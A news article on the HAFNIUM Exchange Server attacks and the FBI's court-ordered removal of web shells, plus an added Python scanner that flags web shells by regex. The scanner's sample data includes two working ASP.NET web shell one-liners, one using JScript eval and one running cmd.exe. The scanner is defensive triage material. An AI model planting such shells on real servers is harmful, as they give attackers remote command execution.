FBI Is Removing Backdoors From Compromised Microsoft Exchange Servers

Microsoft Exchange servers have been targeted by the HAFNIUM threat actors for the past month. In response to the spate of attacks, Microsoft issued out-of-band patches and warned customers to apply the updates as soon as possible. However, the threat is not yet over: the National Security Agency (NSA) reported, and Microsoft has now patched, four new vulnerabilities in the Exchange Server product.

Microsoft announced the latest Exchange fixes as part of a release addressing several CVEs, 19 of which were rated “critical.” That brings the number of patches issued for Exchange Server this year to 329.

In a related development, a federal court in Houston has authorized the FBI to remove backdoors from hundreds of Microsoft Exchange email servers in the US. This comes weeks after threat actors exploited four previously disclosed bugs to attack thousands of networks. According to the Justice Department, the operation to remove the backdoors was “successful.”

Last month, Microsoft said it had discovered Hafnium, a hacking group it assesses to be Chinese state-sponsored, exploiting Exchange servers running on corporate networks.

The four bugs were chained together, enabling the threat actors to compromise vulnerable Exchange servers and steal their contents. Although Microsoft released patches for the vulnerabilities, servers that had already been compromised remained open to further abuse: patching closes the entry point but does not remove the web shells the attackers had already planted. Within days, other threat actors began deploying malware by hitting still-vulnerable servers with the same flaws.

Satnam Narang, Staff Research Engineer at Tenable, noted that after ProxyLogon and the other zero-days in Microsoft Exchange were exploited in the wild, four more vulnerabilities have now been patched.

 “All four are credited to the National Security Agency, with two also being discovered by Microsoft internally,” Narang added.

Two of the bugs (CVE-2021-28480 and CVE-2021-28481) are pre-authentication vulnerabilities, meaning an attacker can exploit them without first authenticating to the vulnerable Exchange server.

He reiterated that threat actors have shown intensified interest in Exchange servers over the last month. Organizations therefore need to apply the Exchange Server patches quickly to shorten the window in which these vulnerabilities can be exploited.

The FBI and the NSA have teamed up to provide information about the Exchange Server exploits. The FBI has also warned about the alarming number of unpatched Exchange servers, which threat actors continue to exploit. The warrant granted to the FBI is a rare authorization, but the operation is not linked to the bugs the NSA identified yesterday.

In its court filing, the FBI stated that the affected Exchange servers were infected with web shells installed by the HAFNIUM threat actors. It sought court authorization because the owners of the affected servers had not been able to remove the web shells themselves, and swift action was necessary to protect other systems.

The FBI pointed out that the operation did not patch the Microsoft Exchange Server vulnerabilities, nor did it remove any additional malware or hacking tools from the servers beyond the web shells themselves. The agency advised network defenders to review the remediation guidance provided by Microsoft, as well as the Joint Advisory of March 10, 2021, for guidance on detecting and patching their systems.
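As an added example, not tooling from Microsoft, the FBI, or the joint advisory, the following Python script illustrates the kind of check the guidance asks defenders to run: scanning a collected copy of the Exchange and IIS web directories for ASP.NET files that execute attacker-supplied request data, which is exactly what a web shell does and what patching alone does not remove. The detection patterns, the "static-only" directory rule, and the sample files it builds in a temporary directory are the editor's own constructed assumptions, not published indicators or real victim data.

```python
"""Heuristic web shell scanner for a collected copy of Exchange/IIS web directories.

Added example (not Microsoft's, the FBI's, or the joint advisory's tooling). It walks a
directory tree, flags ASP.NET script files that hand HTTP request data to a code-execution
sink, and flags server-side scripts sitting in directories that should hold only static files.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

SCRIPT_EXTS = (".aspx", ".ashx", ".asmx", ".asax")

# Editor's heuristics, not a published IOC list. A web shell has to (a) read operator input
# from the HTTP request and (b) pass it to something that executes code. Expect some false
# positives (e.g. data-binding Eval() on a page that also reads a query string); the output
# is a triage list for an analyst, not a verdict.
REQUEST_READ = re.compile(
    r"Request\s*(\.\s*(Item|Form|QueryString|Headers|Params))?\s*\[", re.IGNORECASE
)
EXEC_SINK = re.compile(
    r"\beval\s*\(|\bExecute\s*\(|Process\.Start|ProcessStartInfo|Assembly\.Load"
    r"|CompileAssemblyFromSource",
    re.IGNORECASE,
)
# Tight pattern for the classic one-liner shells: eval(Request.Item["..."], "unsafe").
EVAL_OF_REQUEST = re.compile(r"\beval\s*\(\s*Request\b", re.IGNORECASE)

# Directory names under the IIS root that normally serve static helper files only; a
# server-side script there is suspicious on location alone (assumption about normal layout).
STATIC_ONLY_DIRS = {"aspnet_client"}


@dataclass
class Finding:
    path: str
    reasons: list = field(default_factory=list)


def scan_file(path):
    """Return a Finding for `path` if it trips any rule, else None."""
    reasons = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    if EVAL_OF_REQUEST.search(text):
        reasons.append("eval-of-request")
    elif REQUEST_READ.search(text) and EXEC_SINK.search(text):
        reasons.append("request-data-reaches-exec-sink")
    parts = {p.lower() for p in os.path.normpath(path).split(os.sep)}
    if parts & STATIC_ONLY_DIRS:
        reasons.append("server-side-script-in-static-only-dir")
    return Finding(path, reasons) if reasons else None


def scan_tree(root):
    """Walk `root` and return Findings (sorted by path) for every script file that trips a rule."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCRIPT_EXTS):
                hit = scan_file(os.path.join(dirpath, name))
                if hit:
                    findings.append(hit)
    return sorted(findings, key=lambda f: f.path)


def summarize(findings):
    """Map file basename -> reasons; convenient for a report."""
    return {os.path.basename(f.path): f.reasons for f in findings}


def build_sample_tree():
    """Constructed sample data (not real victim files): two legitimate-looking pages, a
    JScript one-liner shell under owa/auth, and a C# command shell under aspnet_client."""
    root = tempfile.mkdtemp(prefix="exchange_triage_")
    owa_auth = os.path.join("FrontEnd", "HttpProxy", "owa", "auth")
    static_dir = os.path.join("inetpub", "wwwroot", "aspnet_client", "system_web")
    files = {
        # Legitimate page: no request data, no execution sink.
        os.path.join(owa_auth, "logon.aspx"):
            '<%@ Page Language="C#" %><html><body><form runat="server">Sign in</form></body></html>',
        # Reads a query parameter but only redirects with it: must not be flagged.
        os.path.join(owa_auth, "redir.aspx"):
            '<%@ Page Language="C#" %><% string u = Request.QueryString["url"]; Response.Redirect("/owa/"); %>',
        # One-line JScript shell: evaluates whatever the operator posts in "secret".
        os.path.join(owa_auth, "help.aspx"):
            '<%@ Page Language="Jscript"%><%eval(Request.Item["secret"],"unsafe");%>',
        # C# shell dropped in a static-only directory: runs cmd.exe with a POSTed command.
        os.path.join(static_dir, "errorEE.aspx"):
            '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request.Form["cmd"]); %>',
        # Static client-side helper: wrong extension to be scanned at all.
        os.path.join(static_dir, "WebForms.js"): "function WebForm_Init() {}",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding.path, finding.reasons)
```

Point `scan_tree` at a triage copy of the Exchange install directory and the IIS web root rather than at the sample tree; the two shells are reported (help.aspx for the eval-of-request pattern, errorEE.aspx for both the exec-sink and the location rule) while the legitimate pages, including the one that merely reads a query string, are not. Anything it lists still needs a human to confirm, and confirming it is only the first step: as the FBI's operation shows, patching and removing the shell are separate tasks, and neither one finds whatever else the intruder left behind.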

According to the warrant, the affected servers are used in and affect interstate and foreign commerce or communication by virtue of their internet connectivity. The warrant described the impact on them as significant: the web shells affected the availability of information, systems, programs, and data on the servers.

According to the court documents, the targeted systems were located in the Northern District of Georgia, Northern District of Iowa, Western District of Louisiana, District of Idaho, Southern District of Ohio, Northern District of Illinois, District of Massachusetts, and Southern District of Texas.